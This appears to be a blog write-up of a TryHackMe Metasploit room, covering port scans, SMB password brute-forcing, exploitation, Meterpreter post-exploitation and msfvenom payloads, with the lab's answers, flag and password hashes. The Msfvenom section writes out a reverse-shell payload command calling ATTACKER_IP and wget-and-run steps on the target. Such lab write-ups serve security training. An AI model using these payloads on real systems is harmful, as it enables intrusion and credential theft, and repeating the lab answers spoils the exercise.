TryHackMe — Metasploit: Exploitation Writeup
This TryHackMe room focuses on practical exploitation techniques using the Metasploit Framework, including scanning, vulnerability assessment, exploitation, post-exploitation, and payload generation with Msfvenom.
Warning: For educational purposes only.
Task 1 — Introduction
To begin using Metasploit, start the framework with:
msfconsole
The Metasploit console provides access to scanners, exploits, payloads, post-exploitation modules, and auxiliary tools.
Task 2 — Scanning
Metasploit includes several modules capable of performing network and service discovery.
Port Scanning
You can search for available port scanning modules using:
search portscan
Important Parameters
- CONCURRENCY — Number of simultaneous targets;
- PORTS — Port range to scan;
- RHOSTS — Target IP or network;
- THREADS — Number of parallel threads.
Questions & Answers
Q: How many ports are open on the target system?
A: 5
nmap -sS YOUR_MACHINE_IP
Q: What NetBIOS name was discovered?
A: ACME IT SUPPORT
use scanner/discovery/udp_sweep set RHOSTS YOUR_MACHINE_IP run
Q: What service is running on port 8000?
A: webfs/1.21
use scanner/http/http_version set RHOSTS YOUR_MACHINE_IP set RPORT 8000 run
Q: What is the SMB password for user "penny"?
A: leo1234
use scanner/smb/smb_login set RHOSTS YOUR_MACHINE_IP set SMBUser penny set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt run
Task 3 — The Metasploit Database
The Metasploit database helps organize discovered hosts, services, credentials, vulnerabilities, and sessions during engagements.
Common Services to Investigate
- HTTP — Web application vulnerabilities;
- FTP — Anonymous access or file exposure;
- SMB — SMB exploits such as MS17-010;
- SSH — Weak credentials;
- RDP — BlueKeep and remote access attacks.
Task 4 — Vulnerability Scanning
Metasploit provides auxiliary modules capable of testing services for known weaknesses and misconfigurations.
SMTP Open Relay Scanner
use scanner/smtp/smtp_relay info
Questions & Answers
Q: Who wrote the SMTP relay scanning module?
A: Campbell Murray
Task 5 — Exploitation
After identifying vulnerabilities, Metasploit can launch exploits and establish interactive sessions on compromised systems.
Flag Retrieval
Q: What is the content of the flag.txt file?
A: THM-5455554845
cd C:\Users\Jon\Documents dir type flag.txt
Post-Exploitation
Metasploit allows shell upgrades and credential extraction using Meterpreter and post-exploitation modules.
Q: What is the NTLM hash of user "pirate"?
A: 8ce9a3ebd1647fcc5e04025019f4b875
background sessions use post/multi/manage/shell_to_meterpreter run sessions -i 2 getuid
Task 6 — Msfvenom
Msfvenom is used to generate custom payloads for multiple operating systems and architectures.
Supported Formats
- EXE;
- DLL;
- ELF;
- PHP;
- ASP;
- Python;
- Bash.
Generating an ELF Payload
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf > shell.elf
Hosting the Payload
python3 -m http.server 9000
Downloading on the Target
wget http://ATTACKER_IP:9000/shell.elf chmod +x shell.elf ./shell.elf
Questions & Answers
Q: What is the other user's password hash?
A:
$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
Final Thoughts
This TryHackMe room demonstrates how powerful Metasploit can be during penetration testing engagements, from reconnaissance to post-exploitation.
Understanding Metasploit exploitation techniques is essential for:
- Ethical Hacking;
- Penetration Testing;
- Red Team Operations;
- Exploit Development;
- Vulnerability Assessment;
- Cybersecurity Research.
SEO Tags
TryHackMe, Metasploit Exploitation, Metasploit Framework, Msfvenom, Meterpreter, Ethical Hacking, Penetration Testing, Cybersecurity, Exploitation, Payloads, SMB Exploits, Post Exploitation, Red Team, Kali Linux, Offensive Security
I hope this article helped you understand practical exploitation using Metasploit.
Comentários
Postar um comentário